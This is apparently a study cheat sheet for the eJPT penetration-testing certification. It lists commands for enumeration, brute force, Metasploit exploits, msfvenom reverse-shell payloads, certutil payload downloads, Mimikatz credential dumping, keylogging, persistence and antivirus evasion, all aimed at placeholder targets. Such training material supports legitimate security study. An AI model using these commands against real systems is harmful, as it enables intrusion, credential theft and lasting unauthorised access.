eJPT CheatSheet
eJPT CheatSheet
Networking
# Routing
# Linux
ip route
# Windows
route print
# Mac OS X / Linux
netstat -r
# IP
# Linux
ip a
ip -br -c a
# Windows
ipconfig /all
# Mac OS X / Linux
ifconfig
# ARP
# Linux
ip neighbour
# Windows
arp -a
# Mac OS X / Linux
arp
# PORTS
# Linux
netstat -tunp
netstat -tulpn
ss -tnl
# Windows
netstat -ano
# Mac OS X / Linux
netstat -p tcp -p udp
lsof -n -i4TCP -i4UDP
# Connect
nc -v example.com 80
# Scan port
nc -zv <HOST> <PORT>
Information Gathering
# Passive
host <HOST>
whatweb <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
wafw00f -l
wafw00f <HOST> -a
sublist3r -d <HOST>
theHarvester -d <HOST>
theHarvester -d <HOST> -b all
# Google Dorks
site:
inurl:
site:*.sitename.com
intitle:
filetype:
intitle:index of
cache:
inurl:auth_user_file.txt
inurl:passwd.txt
inurl:wp-config.bak
# DNS
sudo nano /etc/hosts
dnsenum <HOST>
# e.g. dnsenum zonetransfer.me
dig <HOST>
dig axfr @DNS-server-name <HOST>
# HOST DISCOVERY
## Ping scan
sudo nmap -sn <TARGET_IP/NETWORK>
## ARP scan
netdiscover -i eth1 -r <TARGET_IP/NETWORK>
## fping
fping -I eth1 -g <TARGET_IP/NETWORK> -a
## fping with no "Host Unreachable errors"
fping -I eth1 -g <TARGET_IP/NETWORK> -a fping -I eth1 -g <TARGET_IP/NETWORK> -
a 2>/dev/null
Enumeration
SMB
# NMAP
sudo nmap -p 445 -sV -sC -O <TARGET_IP>
nmap -sU --top-ports 25 --open <TARGET_IP>
nmblookup -A <TARGET_IP>
# SMBMAP
smbmap -u guest -p "" -d . -H <TARGET_IP>
## Run a command
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor'
'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'
# SMB Connection
smbclient -L <TARGET_IP> -N
smbclient -L <TARGET_IP> -U <USER>
smbclient //<TARGET_IP>/<USER> -U <USER>
smbclient //<TARGET_IP>/admin -U admin
smbclient //<TARGET_IP>/public -N
## SMBCLIENT
help
ls
get <filename>
# ENUM4LINUX
enum4linux -o <TARGET_IP>
enum4linux -U <TARGET_IP>
enum4linux -S <TARGET_IP>
enum4linux -G <TARGET_IP>
enum4linux -i <TARGET_IP>
enum4linux -r -u "<USER>" -p "<PW>" <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>
# HYDRA
gzip -d /usr/share/wordlists/rockyou.txt.gz
# METASPLOIT
msfconsole
msfconsole -q
# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor
FTP
# NMAP
sudo nmap -p 21 -sV -sC -O <TARGET_IP>
nmap -p 21 -sV -O <TARGET_IP>
# FTP
ftp <TARGET_IP>
## FTP client
ls
get <filename>
# HYDRA
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP>
-t 4 ftp
SSH
# NMAP
sudo nmap -p 22 -sV -sC -O <TARGET_IP>
# SSH
ssh <USER>@<TARGET_IP> 22
ssh root@<TARGET_IP> 22
# HYDRA
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <TARGET_IP> ssh
# METASPLOIT SSH
use auxiliary/scanner/ssh/ssh_login
HTTP
# NMAP
sudo nmap -p 80 -sV -O <TARGET_IP>
whatweb <TARGET_IP>
http <TARGET_IP>
browsh --startup-url http://<TARGET_IP>
dirb http://<TARGET_IP>
dirb http://<TARGET_IP> /usr/share/metasploit-
framework/data/wordlists/directory.txt
wget <TARGET_IP>
curl <TARGET_IP> | more
curl -I http://<TARGET_IP>/<DIR>
curl --digest -u <USER>:<PW> http://<TARGET_IP>/<DIR>
lynx <TARGET_IP>
# METASPLOIT HTTP
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/robots_txt
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_version
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
SQL
# NMAP
sudo nmap -p 3306 -sV -O <TARGET_IP>
## Microsoft SQL
nmap -sV -sC -p 1433 <TARGET_IP>
# MYSQL
mysql -h <TARGET_IP> -u <USER>
mysql -h <TARGET_IP> -u root
# Mysql client
help
show databases;
use <DB_NAME>;
select count(*) from <TABLE_NAME>;
select load_file("/etc/shadow");
# HYDRA
hydra -l <USER> -P /usr/share/metasploit-
framework/data/wordlists/unix_passwords.txt <TARGET_IP> mysql
# METASPLOIT MYSQL
use auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_writable_dirs
use auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_login
## MS Sql
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_exec
use auxiliary/admin/mssql/mssql_enum_domain_accounts
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
SMTP
# NMAP
sudo nmap -p 25 -sV -sC -O <TARGET_IP>
nc <TARGET_IP> 25
telnet <TARGET_IP> 25
# METASPLOIT
service postgresql start && msfconsole -q
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use auxiliary/scanner/smtp/smtp_enum
Vulnerability Assessment
# HEARTBLEED
nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET>
nmap -sV --script ssl-heartbleed -p 443 <TARGET_IP>
# ETERNALBLUE
nmap --script smb-vuln-ms17-010 -p 445 <TARGET_IP>
# BLUEKEEP
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# LOG4J
nmap --script log4shell.nse --script-args log4shell.callback-server=
<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_IP>
searchsploit badblue 2.7
# IIS WEBDAV
davtest -url <URL>
davtest -auth <USER>:<PW> -url http://<TARGET_IP>/webdav
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P
/usr/share/wordlists/metasploit/common_passwords.txt <TARGET_IP> http-get
/webdav/
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
use exploit/windows/iis/iis_webdav_upload_asp
# SMB
nmap -p 445 -sV -sC <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use auxiliary/scanner/smb/smb_login
use exploit/windows/smb/psexec
use exploit/windows/smb/ms17_010_eternalblue
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
# LHOST = Host Kali Linux IP
# LPORT = Port Kali will listen for the reverse shell
cd ..
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py <TARGET_IP> shellcode/sc_x64.bin
RDP
# RDP
nmap -sV <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use auxiliary/scanner/rdp/rdp_scanner
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show targets
set target <NUMBER>
set GROOMSIZE 50
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
rdp://<TARGET_IP> -s <PORT>
WINRM
# WINRM
crackmapexec [OPTIONS]
evil-winrm -i <IP> -u <USER> -p <PASSWORD>
nmap --top-ports 7000 <TARGET_IP>
nmap -sV -p 5985 <TARGET_IP>
# Command Shell
evil-winrm.rb -u <USER> -p '<PW>' -i <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/windows/winrm/winrm_script_exec
# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=
<LOCAL_PORT> -f exe -o payload.exe
python3 -m http.server
# Download payload.exe on target
## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-
Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-
suggester.py
# ^^ This is a python3 version of the script
cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
pip install xlrd --upgrade
## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>
UAC
# UAC - UACME
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=
<LOCAL_PORT> -f exe > backdoor.exe
## METASPLOIT - Listening
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
Access Token
load incognito
list_tokens -u
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# Exploitation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TARGET_IP> LPORT=1234 -
f exe > payload.exe
python -m SimpleHTTPServer 80
## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run
## On target system
certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe
# Run payload.exe
# METASPLOIT - Meterpreter
sysinfo
getuid
pgrep lsass
migrate <explorer_PID>
getprivs
# MIMIKATZ
cd C:\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
Linux Exploitation
Shellshock
# BASH - APACHE
nmap -sV --script=http-shellshock --script-args "http-
shellshock.uri=/gettime.cgi" <TARGET_IP>
## METASPLOIT
# Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <TARGET_IP>
set TARGETURI /gettime.cgi
exploit
FTP
# FTP
ftp <TARGET_IP>
ls -lah /usr/share/nmap/scripts | grep ftp-*
searchsploit ProFTPD
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <TARGET_IP>
-t 4 ftp
SSH
# SSH
ssh <USER>@<TARGET_IP>
groups sysadmin
cat /etc/*release
uname -r
cat /etc/passwd
find / -name "flag"
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P
/usr/share/metasploit-framework/data/wordlists/common_passwords.txt
<TARGET_IP> -t 4 ssh
SAMBA
# SAMBA
smbmap -u <USER> -p '<PW>' -H <TARGET_IP>
enum4linux -a <TARGET_IP>
enum4linux -a -u "<USER>" -p "<PW>" <TARGET_IP>
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Cron Jobs
# CRON
crontab -l
SUID
# SUID
file <FILE>
strings <FILE>
# find called binary
rm <BINARY>
cp /bin/bash <BINARY>
./<FILE>
cat /etc/passwd
sudo cat /etc/shadow
use auxiliary/analyze/crack_linux
set SHA512 true
# TSHARK
tshark -D
tshark -i eth1
tshark -r <FILE>.pcap
tshark -r <FILE>.pcap | wc -l
# HTTP traffic
tshark -r <FILE>.pcap -Y 'http' | more
tshark -r <FILE>.pcap -Y "ip.src==<SOURCE_IP> && ip.dst==<DEST_IP>"
# Packets with frame time, source IP and URL for all GET requests
tshark -r <FILE>.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e
ip.src -e http.request.full_uri
# Check destination IP
tshark -r <FILE>.pcap -Y "http.request.method==GET && http.host==<TARGET_URL>"
-Tfields -e ip.dst
# Check session ID
tshark -r <FILE>.pcap -Y "ip contains amazon.in && ip.src==<IP>" -Tfields -e
ip.src -e http.cookie
# Onyl SSID/BSSID
tshark -r <FILE>.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e
wlan.bssid
# WiFi Channel
tshark -r <FILE>.pcap -Y "wlan.ssid==<SSID>" -Tfields -e wlan_radio.channel
## Forward IP packets
echo 1 > /proc/sys/net/ipv4/ip_forward
Metasploit
# MSF Install
sudo apt update && sudo apt install metasploit-framework -y
sudo systemctl enable postgresql
sudo systemctl restart postgresql
sudo msfdb init
ls /usr/share/metasploit-framework
ls ~/.msf4/modules
# msfconsole
db_status
help
version
show -h
show all
show exploits
search <STRING>
search cve:2017 type:exploit platform:windows
use <MODULE_NAME>
set <OPTION>
run
execute # same as run
sessions
# Switch between sessions Ids with
sessions 1
# Rename sessions
sessions -n xoda -i 1
# Run a Meterpreter Command on the session given with `-i`
sessions -C sysinfo -i 1
# Terminate a specific session
sessions -k 1
# Terminate all sessions
sessions -K
# Upgrade a shell session to a Meterpreter session
sessions -u 1
connect
# Payload Options
search eternalblue
use 0
# ^^ specify the identifier
set payload <PAYLOAD_NAME>
set RHOSTS <TARGET_IP>
run
# or
exploit
Meterpreter
# meterpreter > <command>
background
cat
cd
checksum md5 /bin/bash
clearev
download
edit
execute -f ifconfig
getenv
getenv PATH
getuid
hashdump
idletime
ifconfig
lpwd
ls
migrate
mkdir
ps
pwd
resource <file.txt>
rmdir
search -f *.txt
shell
sysinfo
upload
workspace -a <hostname_enum>
# NMAP Export in .XML
nmap -Pn -sV -O <TARGET_IP> -oX <XML_FILE_NAME>
# msfconsole
db_import <XML_FILE_NAME>
hosts
services
vulns
loot
creds
notes
# Nmap inside MSF
db_nmap -Pn -sV -O <TARGET_IP>
# Exploitation
search xoda
use exploit/unix/webapp/xoda_file_upload
set RHOSTS <TARGET_IP>
set TARGETURI /
run
# UDP Scan
search udp_sweep
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS <TARGET_IP>
run
# Service Enumeration
# FTP
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/anonymous
# SMB
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
# HTTP
use auxiliary/scanner/http/apache_userdir_enum
use auxiliary/scanner/http/brute_dirs
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/files_dir
use auxiliary/scanner/http/http_login
use auxiliary/scanner/http/http_header
use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/robots_txt
# MYSQL
use auxiliary/admin/mysql/mysql_enum
use auxiliary/admin/mysql/mysql_sql
use auxiliary/scanner/mysql/mysql_file_enum
use auxiliary/scanner/mysql/mysql_hashdump
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_schemadump
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_writable_dirs
# SSH
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_enumusers
# SMTP
use auxiliary/scanner/smtp/smtp_enum
use auxiliary/scanner/smtp/smtp_version
Vulnerability Scanning
# NMAP
db_nmap -sS -sV -O <TARGET_IP>
# e.g.
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
# Kali Linux terminal
searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
# Metasploit Autopwn
wget https://raw.githubusercontent.com/hahwul/metasploit-
autopwn/master/db_autopwn.rb
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
# msfconsole
load db_autopwn
# msfconsole
analyze
vulns
# WMAP in msfconsole
load wmap
wmap_sites -a <TARGET_IP>
wmap_sites -l
wmap_targets -t <URL>
wmap_targets -l
wmap_run -t
wmap_run -e
wmap_vulns -l
# msfconsole
use auxiliary/scanner/http/http_put
Payloads
# MSFVENOM
msfvenom --list payloads
msfvenom --list formats
msfvenom --list encoders
# Win 32bit
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP>
LPORT=<LOCAL_PORT> -f exe > <PAYLOAD_FILE_x86>.exe
# Win 64bit
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP>
LPORT=<LOCAL_PORT> -f exe > <PAYLOAD_FILE_x64>.exe
# Linux 32bit
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=
<LOCAL_PORT> -f elf > <PAYLOAD_FILE_x86>
# Linux 64bit
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=
<LOCAL_PORT> -f elf > <PAYLOAD_FILE_x64>
use multi/handler
set payload <MSFVENOM_PAYLOAD>
set LHOST <MSFVENOM_LOCAL_HOST_IP>
set LPORT <MSFVENOM_LOCAL_PORT>
run
# Automation
ls -lah /usr/share/metasploit-framework/scripts/resource
msfconsole -q -r handler.rc
# msfconsole
resource handler.rc
Win Exploitation
Default MSF Start
service postgresql start && msfconsole -q
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
db_nmap -sS -sV -O <TARGET_IP>
# db_nmap -sS -sV -O -p- <TARGET_IP>
HFS
# HFS
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
SMB
# SMB
search type:auxiliary EternalBlue
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
WINRM
# WinRM
search type:auxiliary winrm
use auxiliary/scanner/winrm/winrm_auth_methods
# Launch command
search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
set USERNAME <USER>
set PASSWORD <PW>
set CMD whoami
search winrm_script
use exploit/windows/winrm/winrm_script_exec
set USERNAME <USER>
set PASSWORD <PW>
set FORCE_VBS true
TOMCAT
# APACHE TOMCAT
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
check
Linux Exploitation
FTP
# FTP
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
/bin/bash -i
SAMBA
# SAMBA
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
SSH
# SSH
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
run
sessions
sessions 1
SMTP
# SMTP
search libssh_auth_bypass
use exploit/linux/smtp/haraka
set SRVPORT 9898
set email_to [email protected]
set payload linux/x64/meterpreter_reverse_http
set LHOST <LOCAL_IP>
set LPORT 8080
run
# This is a NON-staged payload
Post-Exploitation Fundamentals
# METERPRETER
run post/windows/manage/migrate
## Pivoting
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP>
sessions
sessions 2
Win Post-Exploitation
HTTP/HFS
# Meterpreter
sysinfo
getuid
getsystem
getuid
getprivs
hashdump
show_mount
ps
migrate
# msfconsole
use post/windows/manage/migrate
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares
use post/windows/manage/enable_rdp
set SESSION 1
loot
UAC
# Meterpreter
shell
# Win CMD
net users
net localgroup administrators
# Bypass UAC
background
sessions
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LPORT <LOCAL_PORT>
set TARGET Windows\ x64
getsystem
hashdump
TOKEN IMPERSONATION
DUMP HASHES
# Kiwi - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
# Mimikatz - Meterpreter
cd C:\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
PERSISTENCE
# RDP - Meterpreter
background
use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set SESSION 1
# Regain access
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <LOCAL_IP>
set LPORT <LOCAL_PORT>
# Enabling RDP
use post/windows/manage/enable_rdp
sessions
set SESSION 1
# KEYLOGGING - Meterpreter
keyscan_start
keyscan_dump
keyscan_stop
CLEARING
# Meterpreter
clearenv
PIVOTING
# Meterpreter
run autoroute -s <TARGET1_SUBNET_NETWORK>
use auxiliary/scanner/portscan/tcp
set RHOSTS <TARGET2_IP>
set PORTS 1-100
# Port Forwarding
sessions 1
portfwd add -l <LOCAL_PORT> -p <TARGET2_PORT> -r <TARGET2_IP>
background
db_nmap -sS -sV -p <LOCAL_PORT> localhost
# Target2 Exploitation
use exploit/windows/http/badblue_passthru
set payload windows/meterpreter/bind_tcp
set RHOSTS <TARGET2_IP>
set LPORT <LOCAL_PORT2>
run
Linux Post-Exploitation
netstat -antp
ss -tnl
ps aux
env
# msfconsole
use post/linux/gather/enum_configs
use post/multi/gather/env
use post/linux/gather/enum_network
use post/linux/gather/enum_protections
use post/linux/gather/enum_system
use post/linux/gather/checkcontainer
use post/linux/gather/checkvm
use post/linux/gather/enum_users_history
set SESSION 1
loot
# Dumping Hashes
use post/linux/gather/hashdump
use post/multi/gather/ssh_creds
use post/linux/gather/ecryptfs_creds
use post/linux/gather/enum_psk
use post/linux/gather/pptpd_chap_secrets
set SESSION 1
# PERSISTENCE
# Meterpreter - Manual
shell
whoami
root
cat /etc/passwd
useradd -m ftp -s /bin/bash
passwd ftp
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
# SSH Key
use post/linux/manage/sshkey_persistence
set CREATESSHFOLDER true
set SESSION 1
# Persistence Test
loot
cat /root/.msf4/loot/DATE_Linux_Persistenc_<TARGET_IP>_id_rsa_.txt
# Exit all the msfconsole sessions and close it
exit -y
Armitage
Exploitation
Vulnerability Scanning
# BANNER GRABBING
nmap -sV -O <TARGET_IP>
nmap -sV --script=banner <TARGET_IP>
ls -lah /usr/share/nmap/scripts | grep <KEYWORD>
nc <TARGET_IP> <TARGET_OPEN_PORT>
Exploits
# SEARCHSPLOIT - Install
sudo apt update && sudo apt -y install exploitdb
## Update
searchsploit -u
# Filters search
searchsploit remote windows smb
searchsploit remote linux ssh
searchsploit remote linux ssh OpenSSH
searchsploit remote webapps wordpress
searchsploit local windows
searchsploit local windows | grep -e "Microsoft"
# CROSS COMPILING
sudo apt -y install mingw-w64 gcc
## Windows Target
searchsploit VideolAN VLC SMB
searchsploit -m 9303
# Compile for x64
x86_64-w64-mingw32-gcc 9303.c -o exploit64.exe
# Compile for x86 (32-bit)
i686-w64-mingw32-gcc 9303.c -o exploit32.exe
## Linux Target
searchsploit Dirty Cow
searchsploit -m 40839
gcc -pthread 40839.c -o dirty_exploit -lcrypt
Shells
# NETCAT - Install
sudo apt update && sudo apt install -y netcat
# or upload the nc.exe on the target machine
nc <TARGET_IP> <TARGET_PORT>
nc -nv <TARGET_IP> <TARGET_PORT>
nc -nvu <TARGET_IP> <TARGET_UDP_PORT>
## NC Listener
nc -nvlp <LOCAL_PORT>
nc -nvlup <LOCAL_UDP_PORT>
## Transfer files
# Target machine
nc.exe -nvlp <PORT> > test.txt
# Attacker machine
echo "Hello target" > test.txt
nc -nv <TARGET_IP> <TARGET_PORT> < test.txt
# BIND SHELL
# REVERSE SHELL
# Spawn shells
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
/usr/bin/script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
Frameworks
# METASPLOIT - example
service postgresql start && msfconsole -q
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
search <SERVICE_NAME>
use exploit/multi/http/processmaker_exec
options
set USERNAME <USER>
set PASSWORD <PW>
run
## Server run
sudo powershell-empire server
Win Exploitation
# Banner Grabbing
nc -nv <TARGET_IP> 21
# Enumeration
service postgresql start && msfconsole
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
db_import nmap_10k
hosts
services
use auxiliary/scanner/smb/smb_version
run
hosts
IIS/FTP
# Targeting IIS/FTP
nmap -sV -sC -p21,80 <TARGET_IP>
## Try anonymous:anonymous
ftp <TARGET_IP>
## Brute-force FTP
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P
/usr/share/wordlists/metasploit/unix_passwords.txt <TARGET_IP> ftp
## msfconsole
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST <LOCAL_IP>
set LPORT <LOCAL_PORT>
OPENSSH
# Targeting OPENSSH
nmap -sV -sC -p 22 <TARGET_IP>
## Brute-force SSH
hydra -l administrator /usr/share/wordlists/metasploit/unix_users.txt
<TARGET_IP> ssh
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_users.txt <TARGET_IP>
ssh
## Win
bash
net localgroup administrators
whoami /priv
# msfconsole
use auxiliary/scanner/ssh/ssh_login
setg RHOST <TARGET_IP>
setg RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PW>
run
session 1
# CTRL+Z to background
sessions -u 1
SMB
# Targeting SMB
nmap -sV -sC -p 445 <TARGET_IP>
## Brute-force SMB
hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt
<TARGET_IP> smb
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_passwords.txt
<TARGET_IP> smb
## Enumeration
smbclient -L <TARGET_IP> -U <USER>
smbmap -u <USER> -p <PW> -H <TARGET_IP>
enum4linux -u <USER> -p <PW> -U <TARGET_IP>
## msfconsole
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBUser <USER>
set SMBPass <PW>
run
# msfconsole - Meterpreter
use exploit/windows/smb/psexec
set RHOSTS <TARGET_IP>
set SMBUser Administrator
set SMBPass <PW>
set payload windows/x64/meterpreter/reverse_tcp
run
show databases;
use <db>;
show tables;
select * from <table>;
## msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
run
sysinfo
cd /
cd wamp
dir
cd www\ wordpress
cat wp-config.php
shell
Linux Exploitation
# Enumeration
cat /etc/*release
whoami
VSFTPD
# Targeting VSFTPD
nmap -sV -sC -p 21 <TARGET_IP>
## Try anonymous:anonymous
ftp <TARGET_IP>
## Exploit vsFTPd
searchsploit vsftpd
searchsploit -m 49757
vim 49757.py
chmod +x 49757.py
python3 49757.py <TARGET_IP>
## Brute-force FTP
hydra -l <USER> -P /usr/share/metasploit-
framework/data/wordlists/unix_users.txt <TARGET_IP> ftp
ftp <TARGET_IP>
cd /
cd /var/www/dav
put shell.php
## Attacker listener
nc -nvlp <PORT>
## Open http://<TARGET_IP>/dav/shell.php
/bin/bash -i
# Targeting PHP
nmap -sV -sC -p 80 <TARGET_IP>
## Browse
http://<TARGET_IP>/phpinfo.php
# Targeting SAMBA
nmap -sV -p 445 <TARGET_IP>
# msfconsole
use auxiliary/scanner/smb/smb_version
setg RHOSTS <TARGET_IP>
run
use exploit/multi/samba/usermap_script
run
background
sessions -u 1
sessions 2
cat /etc/shadow
Obfuscation
# SHELLTER - Install
sudo apt update && sudo apt install -y shellter
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install
wine32
rm -r ~/.wine
cd /usr/share/windows-resources/shellter
sudo shellter
mkdir AVBypass
cd AVBypass
cp /usr/share/windows-binaries/vncviewer.exe .
# Proceed in Sellter window
pwsh
cd /opt/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1
cd ..
Invoke-Obfuscation
Post-Exploitation
Win Local Enumeration
# MSF Meterpreter
getuid
sysinfo
show_mount
cat C:\ Windows\ System32\ eula.txt
getprivs
pgrep explorer.exe
migrate <PROCESS_ID>
## Users
whoami
whoami /priv
query user
net users
net user <USER>
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"
## Network
ipconfig
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh advfirewall show allprofiles
## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v
# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/enum_logged_on_users
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares
# MSF Meterpreter
getuid
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd
env
lscpu
free -h
df -h
lsblk | grep sd
## Users
whoami
ls -lah /home
cat /etc/passwd
cat /etc/passwd | grep -v /nologin
groups <USER>
groups root
groups
